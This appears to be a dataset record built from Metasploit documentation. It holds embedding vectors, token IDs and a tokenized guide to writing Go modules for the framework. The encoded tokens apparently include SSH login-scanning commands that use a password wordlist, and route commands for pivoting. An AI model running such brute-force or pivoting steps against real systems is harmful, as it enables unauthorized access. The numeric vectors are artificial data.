0.4445958733558655, 0.8271874189376831, -0.6706024408340454, 0.6058511137962341, 0.08453741669654846, 0.5264338850975037, -0.2583935856819153, 0.8739604949951172, 0.19332319498062134, 0.027164015918970108, 0.13436639308929443, -0.03877774253487587, 0.5099126696586609, 0.30240535736083984, -0.4788172245025635, -0.045044247061014175, 0.03655535727739334, -0.30687615275382996, -0.40550991892814636, -0.004538313485682011, 0.1742040365934372, 0.41897910833358765, -0.005761267151683569, -0.18227499723434448, -0.6184048056602478, -0.5236533284187317, 0.7826656699180603, -0.778570830821991, -0.20707541704177856, -0.19621507823467255, 0.254625141620636, -0.004364878870546818, 0.09126872569322586, 0.7471560835838318, -0.6465777158737183, -0.7086266279220581, 0.3735201954841614, -0.0905730351805687, -0.06142823398113251, 0.35530778765678406, -0.33110207319259644, 0.8956568241119385, -0.1282336711883545, -0.03792087733745575, 1.250378966331482, -0.2830623984336853, 0.32948052883148193, 0.09073198586702347, 0.4672776162624359, 1.4529564380645752, 0.03599283844232559, 0.1760353147983551, -0.13751010596752167, 0.3794173002243042, -0.8855682015419006, 0.1828983873128891, -0.23899637162685394, -0.30065327882766724, 0.14046236872673035, -0.039081696420907974, 0.773168683052063, -0.2222912460565567, -0.17950554192066193, 0.622008740901947, -0.136146679520607, 0.8006245493888855, -1.1407607793807983, 0.7800710797309875, -0.0353727824985981, 0.32137733697891235, 0.2586927115917206, 0.29773616790771484, -0.5952426791191101, -0.3502868413925171, -0.4510229527950287, -0.5214155912399292, 0.12015008181333542, 0.10321465879678726, 0.05567418783903122, -0.3597489893436432, 0.490906298160553, -0.013393971137702465, 0.09552858024835587, 0.4695616662502289, -0.4377559423446655, 0.35861530900001526, -0.5025689005851746, 0.2969035506248474, 0.7383946776390076, 0.4809707999229431, -0.03969978913664818, 0.3425072133541107, 0.5629192590713501, -0.18356303870677948, -0.2228391170501709, -0.24430003762245178, 0.15481695532798767, 0.5953323841094971, -0.27444973587989807, 0.4035257399082184, 0.36571362614631653, -0.09813972562551498, -0.5361273884773254, -0.7674147486686707, -0.06683532893657684, 0.06797296553850174, -1.3867143392562866, 0.8885327577590942, -0.6229032278060913, 0.8708124756813049, -0.09425404667854309, -0.9258993864059448, 0.4795026183128357, 0.6530154943466187, -0.5801587700843811, -0.3471806049346924, 0.5329071283340454, -0.13487018644809723, -0.06318005919456482, -0.18699872493743896, 0.5453343987464905, 0.2754787802696228, -0.6518678665161133, 0.35816067457199097, -0.12513254582881927, 0.11720049381256104, -0.16869139671325684, 0.7770774960517883, 0.4425510764122009, 0.21612323820590973, -0.42235106229782104, 0.12947022914886475, -0.7351001501083374, 0.5706377029418945, -0.1455475091934204, 0.4551275372505188, -0.2520131468772888, 0.3973061740398407, -0.5059245228767395, 0.8587297797203064, 0.31463053822517395, -0.3001266121864319, 0.5724917650222778, 0.39983874559402466, 0.45093634724617004, -0.1745981127023697, -0.051425717771053314, 0.930332362651825, 0.33949413895606995, 0.6205012798309326, 0.14149001240730286, 0.2587970495223999, 0.023581422865390778, 0.25854313373565674, 0.11074976623058319, 0.4399508237838745, -0.6757907867431641, 0.7729892730712891, 0.03525174409151077, -0.37673938274383545, -0.37629881501197815, 0.38907891511917114, 0.14111655950546265, 0.5318434238433838, -0.6570092439651489, -0.5897513628005981, 0.04597039148211479, -0.4429563283920288, -0.39514797925949097, 0.10877293348312378, 0.06668011099100113, 0.07305217534303665, 1.0378873348236084, 0.30373597145080566, 0.24480484426021576, -0.39096859097480774, -0.6940680742263794, 0.41356420516967773, 0.03992052748799324, -0.6308594346046448, -0.8008260726928711, 0.0026170231867581606, -0.046413250267505646, -0.18285445868968964, 0.15627999603748322, -0.9364534020423889, 0.517677903175354, -0.5269405841827393, 0.6039950847625732, 0.7549527287483215, -0.04237893596291542, 0.1522315889596939, -0.323125422000885, -0.2816806435585022, 0.10625491291284561, 0.6661568880081177, -0.5866809487342834, -0.025184646248817444, -0.03567760810256004, -0.06317338347434998, -0.07042906433343887, -0.5176590085029602, 0.003973217681050301, -0.040674999356269836, -0.6303860545158386, -0.02856798656284809, -0.6050644516944885, -0.37637993693351746, 0.5971713662147522, 0.00650391960516572, 0.004608931951224804, 0.1074703261256218, 0.9290157556533813, -0.19677819311618805, 0.9477562308311462, -0.06010182574391365, 0.32203686237335205, 0.45358210802078247, -0.19709527492523193, 0.6220258474349976, -0.6587871313095093, 0.7473993301391602, 0.5741462111473083, -0.21285997331142426, -0.5885798931121826, -0.7686096429824829, -0.3282627463340759, -0.5799332857131958, -0.17670172452926636, 0.13120152056217194, 0.12365961074829102, 1.0757862329483032, 0.15963631868362427, -1.0666037797927856, 0.30169951915740967, -0.5791897773742676, 0.06290806829929352, 0.08954662084579468, -0.42165929079055786, 0.5160500407218933, 0.5205667018890381, 0.26767367124557495, -0.9753400683403015, -0.45641157031059265, -0.6874563097953796, 0.3705313503742218, -0.37171489000320435, -0.5036543011665344, 0.5320025682449341, -0.16515852510929108, -0.25229379534721375, -0.5255416631698608, 0.8235968947410583, -0.6276443600654602, -0.07252110540866852, -0.21564893424510956, 0.24293246865272522, 0.18956983089447021, 0.6112205386161804, 0.545475423336029, -0.02666977234184742, 0.8267190456390381, -0.37580499053001404, -0.18684861063957214, -0.18295061588287354, 0.5380545258522034, -0.24060499668121338, 0.2158651202917099, -0.4614417254924774, -0.34420061111450195, -0.2683016061782837, -0.6133731007575989, 0.21158204972743988, 0.8215718269348145, 1.5162372589111328, -0.8122877478599548, 0.24279983341693878, 0.18508832156658173, -0.16526204347610474, 0.8386783599853516, 0.0013996693305671215, -0.6563022136688232, 0.4707539677619934, 0.5139864087104797, 0.0915706604719162, -0.6492777466773987, -0.3892778158187866, 0.1712566316127777, 0.327156662940979, -0.04402792453765869, 0.27416640520095825, -0.024565795436501503, -1.3655307292938232, 0.11173828691244125, -0.5272946953773499, -0.44450441002845764, -0.24395862221717834, 0.053708624094724655, 0.3539716899394989, 0.15595288574695587, -0.6776167750358582, -0.2395351529121399, 0.26373130083084106, 0.641823410987854, 0.2766574025154114, 0.2175416201353073, 0.12056219577789307, 0.277048796415329, 0.8071855306625366, 0.49587586522102356, -0.15591277182102203, -0.09414457529783249, -0.06100158020853996, 0.9551433324813843, -0.4058661460876465, -0.07905746251344681, -0.13756653666496277, 0.04594459757208824, -0.18301481008529663, 0.501719057559967, -0.24457530677318573, 0.10278799384832382, -0.6091949939727783, 0.2740679085254669, 0.6797658205032349, 0.12981007993221283, -0.3884975016117096, -0.7821866869926453, -0.4328419268131256, 0.4335622787475586, 0.8766387701034546, -0.11325326561927795, -0.2694236636161804, 0.21238118410110474, 0.22139310836791992, -0.29311949014663696, -1.0016415119171143, -0.9376643896102905, 0.2823924124240875, -0.5297465920448303, -1.0373936891555786, 0.6540645956993103, 0.6767394542694092, 0.1808234602212906, -0.43594738841056824, -0.3644029498100281, 0.21367397904396057, -0.7527905702590942, -0.43191325664520264, -0.5053728818893433, 0.16182048618793488, -0.2693825364112854, 0.4080105423927307, -0.6032188534736633, -0.4819354712963104, -0.12989331781864166, 0.17193645238876343, -0.14312861859798431, 0.28196588158607483, -0.4891737401485443, -0.10967514663934708, -0.31424668431282043, 0.13158343732357025, 0.09873654693365097, 0.585105836391449, -0.31727999448776245, -0.5831061005592346, 0.23119068145751953, 0.4509405195713043, -0.95811527967453, 0.35478517413139343, -0.0760754868388176, -0.1698528379201889, -0.29037371277809143, 0.4812827408313751, 0.19407537579536438, -0.25015297532081604, 0.7115960717201233, -0.011601708829402924, -0.04363309219479561, 0.034445058554410934, -0.36800387501716614, 0.3372957408428192, 0.15997734665870667, 0.1332336813211441, 0.02663436159491539, -0.7637941837310791, 0.7612630128860474, 0.6563273072242737, -0.02398756705224514, 0.7995949387550354, -0.7512653470039368, 0.5974827408790588, -0.13334113359451294, 0.03186577931046486, 0.24976187944412231, -0.4629349708557129, 0.2950040102005005, 0.6168992519378662, -0.2712100148200989, 0.2168089896440506, -0.10500138998031616, -0.41503265500068665, -0.23188301920890808, 0.6633917689323425, -0.19817541539669037, 0.2598794996738434, -0.19455792009830475, -0.5242913365364075, 0.3956034183502197, -0.3835470378398895, -0.8258216977119446, -0.7004073858261108, -0.5802609920501709, 0.08001628518104553, -0.4517594277858734, -0.5486867427825928, -0.1641026735305786, -0.1831570416688919, 0.43436408042907715, 0.024022536352276802, 0.09661385416984558, -0.16017410159111023, -0.1329786628484726, 0.2655577063560486, 0.8995550870895386, -0.09955060482025146, -1.0231925249099731, 0.16701562702655792, -0.18730221688747406, -0.04870257526636124, 0.902418315410614, 0.23082363605499268, 0.09245738387107849, -0.7555623054504395, -0.5771793127059937, 0.08553726971149445, -0.2748607099056244, -0.8437541723251343, -0.3983094394207001, -0.9652817845344543, -1.0694646835327148, 0.6606979966163635, 0.25213417410850525, -0.7692441344261169, 0.8890522122383118, -0.5900591015815735, 0.3932306468486786, -0.6361612677574158, -0.062365978956222534, -0.01948370784521103, -0.3436065912246704, -0.40907469391822815, 0.9122319221496582, -0.12043330073356628, 0.21116694808006287, 0.3670434355735779, -0.05848582834005356, -0.043572332710027695, 0.5062896013259888, -0.5734379291534424, -0.19838285446166992, 0.010884895920753479, 0.5987972021102905, -0.08205892890691757, 0.5604487657546997, -0.4653105139732361, 0.21706296503543854, 0.21884168684482574, 0.7336203455924988, -0.9114211797714233, -0.14722727239131927, -1.542724609375, 0.7816781997680664, 0.9911547899246216, -0.16071680188179016, 0.0837542936205864, 0.3293445408344269, 0.5603121519088745, 0.4447571933269501, 0.06788765639066696, 0.23483331501483917, 0.025742022320628166, -0.17362387478351593, -0.7002228498458862, 0.594027042388916, 0.28911590576171875, 0.31678450107574463, 0.19575121998786926, -0.3022879660129547, -0.04004988446831703, -0.5867375135421753, -0.4692346751689911, 0.9784771203994751, -0.20266269147396088, 0.1877138465642929, -0.8716173768043518, 0.784874677658081, 0.5168259143829346, 0.014233466237783432, -0.2512023448944092, -0.531623125076294, 0.10733555257320404, 0.11693613976240158, -0.4117579460144043, -1.1663979291915894, -0.44652125239372253, -0.5446551442146301, 0.5109935402870178, -0.363054484128952, -0.08625257015228271, -0.3678673803806305, -0.433549165725708, 0.3776599168777466, 0.013154593296349049, -0.25219058990478516, 0.04324589669704437, 0.7078105211257935, 0.4733814001083374, 0.15760692954063416, 0.025577491149306297, -0.003123121103271842, 0.26771318912506104, -0.039689235389232635, 0.2652188539505005, 0.5581759810447693, -0.07458950579166412, 0.8204679489135742, 0.21209721267223358, -0.6346826553344727, -1.2572746276855469, -0.7178226709365845, -0.1994304209947586, -0.15860328078269958, -0.06591124832630157, -0.642395555973053, 0.17337343096733093, -0.41118985414505005, -0.3721267879009247, -0.02622758224606514, 0.10862653702497482, -0.0614958181977272, -0.8312622308731079, -0.2610653042793274, -0.35885822772979736, -0.15862075984477997, 0.4949493110179901, 0.2379799336194992, -0.41353410482406616, -0.8980158567428589, -0.04388127103447914, 0.02437453716993332, 1.1366115808486938, 0.00048318877816200256, 0.11806999891996384, 0.5043861269950867, 0.24097689986228943, 0.6533319354057312, 1.095310091972351, -0.2721586227416992, 1.018425464630127, 0.1620301604270935, -0.23420609533786774, -0.7247061729431152, 0.039107922464609146, -0.024272769689559937, -0.20610298216342926, 0.32298287749290466, -0.36968159675598145, 0.22652754187583923, 0.44268929958343506, 0.620112419128418, 0.1291913390159607, -1.1619758605957031, 0.4449537694454193, -0.6235897541046143, -0.7463721036911011, -0.28884246945381165, 0.26717206835746765, -0.13605058193206787, -0.1248927190899849, -1.060632586479187, -0.3413048982620239, -1.0692923069000244, 0.323188841342926, -0.11860981583595276, -0.32375580072402954, -0.426035076379776, -0.20402155816555023, -0.8917534947395325, -0.07820649445056915, -0.833057701587677, -0.40603724122047424, 0.23269838094711304, -0.7582170367240906, 0.19939236342906952, -0.15950872004032135, -0.2283993512392044, -0.05446940287947655, -0.2138579785823822, 0.3592812716960907, 0.039533261209726334, -0.46085792779922485, -0.15249215066432953, -0.08850270509719849, -0.12636953592300415, 0.5626426935195923, 0.32793739438056946, 0.0999666228890419, 0.9123430252075195, 0.32506778836250305, 0.0025772221852093935, -0.07256334275007248, 0.051953256130218506, 0.46894991397857666, -0.6367073059082031, -0.2672581076622009, -0.30385830998420715, -0.2776106595993042, -0.27185094356536865, 0.32544517517089844, -0.702505886554718, 0.1832440346479416, 0.13904638588428497, 0.4158543348312378, -0.14766116440296173, 0.3354596495628357, -0.16473627090454102, -0.014347949996590614, 0.49427297711372375, 0.36457639932632446, 0.5835514068603516, -0.285087913274765, -0.09877193719148636, -0.2306184023618698, 0.1792782098054886, -0.12014273554086685, 0.010997642762959003, 0.15981444716453552, 0.23449622094631195, 0.8831480145454407, -0.6705350875854492, 0.23862609267234802, 0.2419571578502655, 0.07979068905115128, -0.48111647367477417, 0.27561864256858826, 0.3603051006793976, -0.6976328492164612, 0.4555369019508362, -0.11338508129119873, -0.7724440693855286, 0.007563907653093338, -1.2036265134811401, -0.3173884451389313, 0.0741792544722557, -0.7113389372825623, 0.20015859603881836, -0.6513957381248474, -0.3481442630290985, 0.01302170380949974, 0.3533017635345459, -0.2586051821708679, -0.15815326571464539, -0.055543918162584305, 0.4567863643169403, 0.5905932784080505, -0.572163462638855, -0.07145139575004578, -0.4396117329597473, 0.5792703628540039, -0.18748430907726288, -0.8204360604286194, -0.4553198516368866, 1.2927446365356445, 0.3862871825695038, 0.004299078602343798, -0.6511960029602051, -0.3641778528690338, 0.6326054930686951, 0.18928420543670654, 0.09457383304834366, 0.04192529618740082, -0.3429584205150604, 0.3748061954975128, -0.36371687054634094, -0.011569865979254246, -0.1495271772146225, 0.017340656369924545, -0.46170249581336975, 0.3010005056858063, -0.4381377398967743, -0.13728250563144684, -0.3304647207260132, 0.3029898703098297, 0.05549408122897148, 0.4115317463874817, 0.7139132618904114, -0.3908311724662781, -0.49779459834098816, -0.38579002022743225, 0.3238767981529236, 1.1283810138702393, 0.7900475859642029, -0.12833531200885773, 0.8655191659927368, 0.00826285406947136, -0.7263381481170654, -0.43678200244903564, 0.15814919769763947, -0.5171110033988953, -0.8341281414031982, 0.52879399061203, -0.6392021179199219, -0.06585720926523209, 0.09059177339076996, 0.17526006698608398, -0.039981383830308914, -0.36132514476776123, 0.6666887998580933, -0.004047381691634655, -0.09935493022203445, 1.5883253812789917, -0.2624916136264801, 0.20351973176002502, 0.06746573746204376, 0.016423216089606285, 0.78878253698349, 0.09077858179807663, -0.7664703726768494, 0.2694965898990631, 0.9307283759117126, 0.45787498354911804, -0.41764867305755615, 0.2819848656654358, 0.050089605152606964, -0.6427615284919739, -0.06625189632177353, 0.4903542995452881, -0.9833926558494568, 0.3414289057254791, -0.39419159293174744, 0.23133671283721924, -0.45794200897216797, -0.11241854727268219, 0.1070694625377655, -0.17168878018856049, -0.12284242361783981, -0.24984514713287354, -0.09971030801534653, -0.8839770555496216, 0.24139493703842163, -0.6868531703948975, -0.08751621097326279, 0.7122099995613098, -0.4830329418182373, -0.09653592109680176, 0.9201988577842712, -0.12447776645421982, 0.53718501329422, 0.3309347927570343, 1.2207187414169312, 0.719476044178009, 0.9340319633483887, 0.7901473045349121, -0.2232486605644226, -0.12980151176452637, 0.3839453160762787, -0.9704136252403259, 0.2747839689254761, -0.15012195706367493, 0.10812827199697495, -0.33059170842170715, -0.5059463977813721, -0.698127806186676, -0.2351127713918686, 0.10317772626876831, 0.11590444296598434, -0.5587382316589355, 0.4606756567955017, -0.19020462036132812, -0.3730757236480713, 0.0619792640209198, 0.9701053500175476, 0.15263569355010986, -0.30471450090408325, -0.7263579964637756, 0.1944640725851059, -0.7109637260437012, -0.23679867386817932, 0.1137087494134903, -0.4031596779823303, 0.16457897424697876, -0.5126335620880127, -0.6758285760879517, -0.4468424618244171, 0.1446399688720703, 0.11601752042770386, -0.28428134322166443, 0.22199390828609467, 0.4660497307777405, 0.5238938927650452, 0.6626536846160889, -0.04645514860749245, -0.7311866879463196, 0.04123937711119652, 0.45797866582870483, 1.073662519454956, -0.477591335773468, 0.9006597995758057, 0.18078187108039856, -0.5311048626899719, 0.35106006264686584, -0.07752659916877747, 0.29898330569267273, -0.613409698009491, -0.10193975269794464, -0.1654091328382492, -0.5969766974449158, -0.7230498194694519, -0.3559459149837494, -0.7084192633628845, 0.6013551950454712, 0.21602050960063934, -0.6268967986106873, -0.48768624663352966, -1.3499863147735596, -1.1949114799499512, -0.01770835556089878, -0.7022696137428284, -0.4345713257789612, -0.0880722627043724, -0.6841654777526855, 0.15371105074882507, -0.7485448718070984, 4.376482009887695, 0.9691269993782043, 0.2072124481201172, 0.18637387454509735, -0.21058093011379242, 0.5058244466781616, 0.4609352946281433, -0.32730162143707275, 0.4122568964958191, -0.663262128829956, 0.5165300369262695, -0.32070839405059814, 0.6454214453697205, 0.06319653242826462, -0.37826019525527954, 0.7629122138023376, -0.5298051834106445, -0.007881158962845802, 0.7740755081176758, -0.5194402933120728, -0.7752938866615295, -0.29337435960769653, -0.44927823543548584, 0.6407812833786011, 0.4462456703186035, 1.329482913017273, 0.5289915204048157, -0.5513343811035156, -0.5571107864379883, -0.17910322546958923, 0.24871784448623657, -0.6503493189811707, 0.9375938177108765, -0.3552682399749756, 0.14655499160289764, 0.5645930171012878, -0.06981440633535385, 0.16343119740486145, 0.0165712907910347, -0.5145160555839539, 0.3154957890510559, 0.5643972158432007, -0.5903618931770325, -0.09418389201164246, -0.2328394651412964, 0.1817803680896759, 0.3263295888900757, 0.21806205809116364, 0.9721620678901672, 0.045009955763816833, 0.19034931063652039, 0.26099061965942383, -0.09025351703166962, 0.18535393476486206, -0.8230935335159302, -0.48837071657180786, -0.0769771933555603, -0.2639070749282837, 0.2568640410900116, 0.11488872021436691, 0.23711128532886505, 0.18724824488162994, -0.24699655175209045, 0.03173910453915596, 0.07028094679117203, 0.9645408391952515, 0.5433624386787415, -0.16013190150260925, -0.7437958121299744, -0.4184819161891937, 0.07165301591157913, -0.2565079927444458, -0.5769562721252441, -0.3027244806289673, -0.47552335262298584, 0.6493058800697327, 0.6276387572288513, 0.6133102774620056, 0.41331833600997925, -0.36391890048980713, -0.015485141426324844, 0.5627368092536926, -0.33343592286109924, -0.11372952908277512, 0.452800452709198, 0.6981780529022217, -0.3951362371444702, -0.4520508944988251, -0.6551141738891602, 0.037438251078128815, 0.37235191464424133, 0.7256227731704712, -0.8243557810783386, 0.06381414830684662, -0.258809357881546 ]
[ 2232, 1024, 1013, 1013, 5310, 1030, 17613, 1012, 16923, 1012, 19015, 1012, 1014, 16457, 1027, 2753, 3413, 1035, 5371, 1027, 1012, 1013, 2773, 9863, 1012, 19067, 2102, 7020, 2232, 8833, 2378, 5219, 10128, 2017, 2031, 9398, 7020, 2232, 22496, 1996, 7020, 2232, 1035, 8833, 2378, 11336, 2097, 2330, 1037, 18804, 13102, 4135, 4183, 5219, 2005, 2017, 1024, 2224, 26221, 1013, 7020, 2232, 1013, 7020, 2232, 1035, 8833, 2378, 2448, 7020, 2232, 1024, 1013, 1013, 5310, 1024, 3413, 1030, 18253, 1012, 2324, 1012, 9402, 1012, 2322, 2128, 1011, 2478, 7020, 2232, 22496, 1999, 1037, 4942, 7159, 1024, 2224, 26221, 1013, 7020, 2232, 1013, 7020, 2232, 1035, 8833, 2378, 2448, 28744, 2099, 1024, 1013, 2484, 1024, 7020, 2232, 1024, 1013, 1013, 5310, 1024, 3413, 1030, 17613, 1012, 16923, 1012, 19015, 1012, 1014, 16457, 1027, 2753, 2478, 2019, 4522, 3417, 1024, 2224, 26221, 1013, 7020, 2232, 1013, 7020, 2232, 1035, 8833, 2378, 2448, 7020, 2232, 1024, 1013, 1013, 5310, 1024, 3413, 1030, 17613, 1012, 16923, 1012, 13138, 1012, 1020, 1024, 19015, 2475, 7020, 2232, 14255, 22994, 2075, 4183, 2003, 2069, 2825, 2000, 4685, 7020, 2232, 14255, 22994, 2075, 2065, 1996, 6556, 4539, 2038, 1996, 3499, 13535, 14376, 2953, 7652, 2075, 5724, 2022, 9124, 1999, 1996, 8241, 1521, 1055, 9563, 5371, 1010, 2029, 2003, 2411, 1996, 12398, 1012, 2065, 1996, 5724, 2003, 9776, 2030, 1996, 2062, 3563, 9146, 26915, 5724, 2515, 2025, 3499, 1996, 4434, 2000, 2022, 2081, 1010, 1996, 4434, 2097, 8246, 2007, 1996, 23710, 10890, 7561, 1012, 2066, 8316, 28139, 3334, 1010, 2009, 2003, 2825, 2000, 3417, 2830, 2083, 1037, 18804, 13102, 4135, 4183, 7020, 2232, 5219, 1024, 2799, 5587, 18253, 1012, 2324, 1012, 9800, 1012, 1014, 1013, 2484, 7020, 2232, 1035, 5219, 1035, 8909, 2000, 1037, 2799, 2005, 1996, 2087, 3728, 2441, 8316, 28139, 3334, 5219, 1024, 2799, 5587, 18253, 1012, 2324, 1012, 9800, 1012, 1014, 1013, 2484, 1011, 1015, 102 ]
metasploit
12.txt
2
[CLS] contributing modules in go can be achieved in a few simple steps as outlined below. as for supported go version, we have tested with 1. 11. 2, no promised for version 2. 1. locationselect the appropriate module path based on the type of module you are trying to contributebe sure to include appropriate module documentation under heretest your documentation is correct by executing info - d 2. executioninclude this line at the top of your module : / / usr / bin / env go run " $ 0 " " $ @ " ; exit " $? " ensure your file is an executable file 3. setupinitialize your module with the module metadata : import " metasploit / module " func main ( ) { metadata : = & module. metadata { name : " < module name ", description : " < describe > ", authors : [ ] string { " < author 1 > ", " < author 2 > " }, date : " < date module written ", type : " < module type > ", privileged : < true | false >, references : [ ] module. reference { }, options : map [ string ] module. option { " < option 1 " : { type : " < type > ", description : " < description > ", required : < true | false >, default : " < default > " }, " < option 2 " : { type : " < type > ", description : " < description > ", required : < true | false >, default : " < default > " }, } } module. init ( metadata, < the entry method to your module > ) } full examplenote : above does not outline the full potential list of metadata optionscurrently supported module types : remote _ exploitremote _ exploit _ cmd _ stagercapture _ serverdossingle _ scannersingle _ host _ login _ scannermulti _ scanner 4. shared codefor code that is shared specific to your module create a directory in your module directory : shared / src / metasploit will automatically add these to the gopathfor code that you think could be used across modules, add code here3rd party libs aren ’ t currently supported but we welcome patches 5. finalizetest your pull requestcreate a pull requestno coding standard here, be sure to gofmt [SEP]
[ 0.8929096460342407, -0.11667446047067642, -0.35208582878112793, -0.18259645998477936, -0.35825833678245544, -0.16842344403266907, -0.05570755526423454, 0.0754767507314682, -0.061205532401800156, 1.139252781867981, -0.4730064868927002, 0.23130697011947632, 0.988137423992157, -0.051059454679489136, -0.004847580101341009, 0.5961443185806274, 0.549977719783783, -0.2321355938911438, -0.8122808337211609, 0.07799623161554337, 0.2851235568523407, 0.0746145024895668, -0.9222345948219299, 0.07753817737102509, -0.7073431611061096, 0.16998188197612762, 0.04671257734298706, 0.031771086156368256, 1.4112926721572876, 0.7180310487747192, 0.0885290578007698, 0.16327425837516785, 0.3139188587665558, -0.6433265805244446, 0.17076154053211212, -0.48717886209487915, 0.4512161612510681, -0.3905300199985504, -0.8720579743385315, -0.4269133508205414, -0.06636690348386765, -0.06374776363372803, 1.0779742002487183, -0.4645927846431732, -0.6362570524215698, 0.4292853772640228, 0.3750230073928833, 0.13674411177635193, 0.2282436043024063, -0.4082617163658142, 0.2428775131702423, 0.8397347331047058, 0.33112865686416626, -0.24542643129825592, -0.3697732090950012, -0.33699294924736023, 0.15445633232593536, 0.3876476287841797, -0.48418325185775757, 0.24618199467658997, -0.21979711949825287, 0.4730186462402344, -0.36009418964385986, -0.44013115763664246, 0.052680790424346924, 0.51644366979599, -0.08885757625102997, 0.3496314585208893, -0.17934735119342804, -0.38187092542648315, 0.15748943388462067, 0.5014903545379639, -0.7211652398109436, -0.6261196732521057, -0.2776809334754944, -0.203600212931633, 0.33733606338500977, -0.1808139681816101, 0.050836656242609024, 1.2877076864242554, 0.04939186945557594, 0.6618474125862122, -0.14368093013763428, -0.186382457613945, -0.1523345559835434, -0.4620080888271332, 0.02435479685664177, -0.7651215195655823, -0.33354607224464417, 0.10506729036569595, -0.05286197364330292, 1.1781340837478638, -0.057794127613306046, 0.33519482612609863, -0.3513142466545105, 0.5170711278915405, -0.32936471700668335, 0.40090835094451904, 0.19655975699424744, 0.25442901253700256, 0.39944007992744446, 0.7456086874008179, -0.06383319944143295, 0.29680103063583374, 0.04135430231690407, 0.20516711473464966, 0.1885475516319275, 0.2766026258468628, -0.26353132724761963, -0.21210798621177673, -0.08839890360832214, -0.26538023352622986, -0.1610005646944046, -0.7141278386116028, 0.07736887037754059, -0.15909896790981293, 0.08305131644010544, -0.019882043823599815, -0.4179455041885376, -0.030302174389362335, 0.6739063858985901, -0.6094321608543396, -0.10995248705148697, -0.41903239488601685, -0.7077392339706421, -0.1660032570362091, 0.12283869087696075, 0.7884997129440308, -0.7162230610847473, -0.1715368926525116, -0.10265973955392838, -0.019721481949090958, 0.44150540232658386, 0.1859346479177475, -0.05693741887807846, 0.6023340821266174, -0.3137408494949341, -0.1965697556734085, 0.8547493815422058, -0.37876638770103455, 0.32039886713027954, -0.13233664631843567, 0.2781989276409149, 0.7641198039054871, -0.046084385365247726, 0.4108801484107971, -0.6167500615119934, 0.0341557152569294, -0.7610072493553162, 0.34214672446250916, 0.05094361677765846, -0.6108189821243286, 0.20056626200675964, 0.24798353016376495, 0.5365568995475769, 0.26913103461265564, -0.770359218120575, 0.6004775166511536, 1.2547727823257446, 0.9081940650939941, -0.22488170862197876, 0.7323818802833557, -0.17730072140693665, 0.7020941376686096, -0.022093499079346657, 0.24946804344654083, -0.3802453279495239, -0.9448435306549072, -0.07797621935606003, -0.5976455211639404, 0.12299696356058121, 0.16728660464286804, -0.31288182735443115, -0.06948032975196838, 0.985672116279602, 0.17362143099308014, 0.4648871123790741, 0.21546529233455658, -0.12243172526359558, 0.4263036549091339, -0.5769710540771484, 1.004692554473877, 0.37650877237319946, 0.9071435928344727, -0.3286779224872589, 0.7648263573646545, 0.20301975309848785, 0.105659119784832, -0.3149426579475403, -0.5299422740936279, 0.07336196303367615, 0.5079184770584106, 0.11882854253053665, 0.32289382815361023, -0.32661372423171997, -0.4169571101665497, -0.14108099043369293, 0.2614503800868988, -0.587020218372345, -0.6887530088424683, -0.9948522448539734, 0.31218284368515015, -0.21902140974998474, 0.3707430064678192, -0.4040420651435852, -0.8443483710289001, 0.3403572738170624, 0.42298513650894165, -0.5335349440574646, -0.5054941177368164, 0.8194977045059204, -0.20428188145160675, 0.051962960511446, 0.2465619593858719, 0.21103833615779877, -0.6831427812576294, -0.35073551535606384, 0.05702689662575722, -0.07363898307085037, -0.031474530696868896, -0.4573986530303955, 0.34875941276550293, 0.5824036598205566, -0.01877867989242077, -0.6212995648384094, -0.123554527759552, 0.38140708208084106, 0.8860460519790649, 0.05513158440589905, 0.10072341561317444, -0.09936467558145523, 0.09914304316043854, 0.12294026464223862, 0.8105023503303528, 0.3345274329185486, 0.005459900479763746, 0.6339916586875916, 0.6022188067436218, 0.15780287981033325, -0.1688167005777359, 0.4157695472240448, 0.16627717018127441, -0.10543292760848999, 0.2089664340019226, 0.2295112907886505, 0.2917497158050537, 0.016780108213424683, -0.3476332724094391, -0.059335824102163315, 0.041569821536540985, -1.3116836547851562, 1.6270328760147095, 0.4025909900665283, 0.15237808227539062, -0.2660578787326813, -0.7334015369415283, -0.059191375970840454, 0.3856950104236603, -0.5549837946891785, 0.05164196342229843, 0.727996289730072, 0.06965536624193192, -0.321494996547699, 0.27685678005218506, 0.040232717990875244, 0.44756844639778137, 0.26990360021591187, -0.20794345438480377, -0.05531430244445801, -0.2806120812892914, -0.132951557636261, 0.43218672275543213, -1.162121057510376, 0.0007331192609854043, -0.942074179649353, 0.21492190659046173, 0.293362557888031, -0.829613983631134, -0.850626528263092, -0.49588197469711304, 0.6919392347335815, 0.15108540654182434, 0.26477834582328796, 0.19663991034030914, 0.09428472071886063, -0.7395006418228149, -0.5773959755897522, -0.39938610792160034, -0.807092010974884, 1.2453949451446533, -0.6932166814804077, 0.44442304968833923, -0.054823268204927444, -0.05223141238093376, -0.09130118042230606, 0.1848263293504715, 0.29646041989326477, 0.0463857501745224, -0.4294264316558838, 0.3428952395915985, -0.7456503510475159, -0.23735548555850983, 0.5293242335319519, -0.010686901398003101, 0.34587153792381287, 0.04308335483074188, 0.20983991026878357, -0.6857139468193054, 1.2166624069213867, 0.5642606616020203, -0.4165574312210083, 1.033276081085205, 0.008751055225729942, -0.1761271208524704, -0.8309910297393799, 0.8135409355163574, 0.5707340240478516, -0.32966285943984985, -0.2175516039133072, -0.44244441390037537, -0.4235609173774719, -0.6015264987945557, 0.6421419978141785, -0.241830512881279, 0.34596675634384155, 0.39606526494026184, 0.057882290333509445, -0.8109650611877441, 0.3673848509788513, -0.3216923475265503, -0.31356844305992126, -0.3175351023674011, 0.27079322934150696, 0.657281756401062, -0.02739544026553631, 0.2715994715690613, -0.9466660618782043, 0.15450522303581238, -0.4752301573753357, -0.13666972517967224, -0.1733546257019043, -0.45288529992103577, 0.644472599029541, -0.08494261652231216, 0.042943187057971954, 0.03555910289287567, 0.6219372749328613, -0.08687666058540344, -0.035797424614429474, -0.5282193422317505, 0.18172305822372437, 0.6121087670326233, 0.7744428515434265, 0.4389985501766205, 0.553712010383606, 1.0109119415283203, -0.2951553165912628, 0.11433742195367813, 0.02933424711227417, 0.060011476278305054, -0.1856069564819336, 0.8849912881851196, -0.22371777892112732, -0.41520634293556213, -0.5581390261650085, -0.7004961967468262, -0.3907461166381836, 0.9159224629402161, 0.43714025616645813, -0.6064472794532776, 0.8868863582611084, -0.3609468340873718, 0.08758021891117096, -0.11673755198717117, -0.13951121270656586, -0.015576413832604885, 0.46982845664024353, 0.21085356175899506, 0.5871055126190186, -0.5461615920066833, -0.5147935748100281, 0.2398235946893692, 0.44655337929725647, 0.15073750913143158, 0.17960435152053833, -0.29227641224861145, 